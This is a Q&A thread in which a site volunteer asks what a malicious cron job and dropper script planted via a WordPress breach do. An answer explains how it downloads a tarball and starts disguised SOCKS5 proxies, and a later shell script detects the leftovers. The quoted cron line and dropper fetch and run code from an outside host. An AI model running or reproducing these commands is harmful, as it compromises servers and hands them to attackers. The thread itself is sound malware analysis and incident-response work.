KBriggs

Reputation: 1412

some malware that appeared on our site related to the recent wordpress attack

Apparently a site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in wordpress. The result of the breach was a cron job added to the site:

0    */48    *    *    *    cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test

the file it was pulling is this (obviously, don't try to execute this...)

killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig  |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest

I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.

Upvotes: 2

Views: 410

Answers (1)

John1024

Reputation: 113914

I just can't figure out what the heck that file was actually doing.

Quick Summary

In summary, it kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.

In Depth

In more detail, let's look at the script line-by-line:

killall -9 perl

This kills all perl processes.

cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest

The above downloads the file stest.tar and untars it in the /tmp/stest directory, deletes the tar file, and moves into the directory which now holds the downloaded files.

sh getip >>bug.txt

The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.

/sbin/ifconfig  |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt

The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.

bash mbind clean.txt

This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.

More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl which can be downloaded from sourceforge. The version used here differs from the sourceforge version in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script, rather than passed in on the command line. I suspect that the purpose of the latter change is to make the script's command line look relatively innocuous when viewed with a utility such as ps.

bash binded.txt

The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.

cd ..
rm -rf stest

The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.

How to determine if one of the SOCKS servers is still running

The script inst (part of the .tar file) starts each SOCKS server with the command:

/usr/bin/perl httpd

To see if one is still running, look through the output of ps wax and see if you see that command. If you do, use the kill command to stop it.

Upvotes: 3
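The checks in the answer above, turned into a small POSIX shell triage script as an added example (not code from the post or from stest.tar): it matches the exact `/usr/bin/perl httpd` command line in `ps wax` output, flags the cron entry quoted in the question, and looks for leftover dropper files under /tmp. The download host and cron line come from the question; the sample ps and crontab listings are constructed, and the function names are hypothetical.

```sh
#!/bin/sh
# Post-cleanup triage helpers for the stest SOCKS dropper analysed above.
# Added example (hypothetical), not code from the post or from stest.tar.

# socks_pids: print the PID of every process whose command is exactly
# "/usr/bin/perl httpd" (how inst starts each SOCKS server). Reads
# `ps wax` output on stdin: PID TTY STAT TIME COMMAND...
socks_pids() {
    awk '$5 == "/usr/bin/perl" && $6 == "httpd" { print $1 }'
}

# dropper_cron_lines: print crontab lines matching the dropper's entry, by
# the download host from the question or by its "cd /tmp;wget ...;bash" shape.
dropper_cron_lines() {
    grep -E 'clintonandersonperformancehorses\.com|cd /tmp;wget [^;]*;bash '
}

# dropper_files_present DIR: true if DIR still holds the unpacked stest
# tree or the downloaded loader script "test".
dropper_files_present() {
    [ -e "$1/stest" ] || [ -e "$1/test" ]
}

# Constructed `ps wax` excerpt for exercising the filter offline.
SAMPLE_PS='  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:03 /sbin/init
 2201 ?        S      0:00 /usr/bin/perl httpd
 2210 ?        S      0:00 /usr/bin/perl httpd
 2300 ?        Ss     0:01 /usr/sbin/apache2 -k start
 2411 pts/0    S+     0:00 perl -e sleep'

# Constructed crontab: one clean job plus the entry from the question.
SAMPLE_CRON='MAILTO=""
0 3 * * * /usr/local/bin/backup.sh
0    */48    *    *    *    cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test'

# triage: run all three checks on this host. Other accounts' crontabs
# (e.g. the web server user) need `crontab -u USER -l` as root.
triage() {
    echo "== perl httpd processes (kill these PIDs) =="
    ps wax | socks_pids
    echo "== cron entries to remove =="
    { crontab -l 2>/dev/null; cat /etc/crontab /etc/cron.d/* 2>/dev/null; } \
        | dropper_cron_lines
    echo "== leftover dropper files in /tmp =="
    dropper_files_present /tmp && ls -ld /tmp/stest /tmp/test 2>/dev/null
}

# Offline run on the constructed sample by default; --live inspects this host.
if [ "${1:-}" = "--live" ]; then triage; else printf '%s\n' "$SAMPLE_PS" | socks_pids; fi
```

Run it with `--live` on the affected host; a PID listed under the first heading is a SOCKS server still running and should be killed, and any cron line listed should be removed from that user's crontab.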
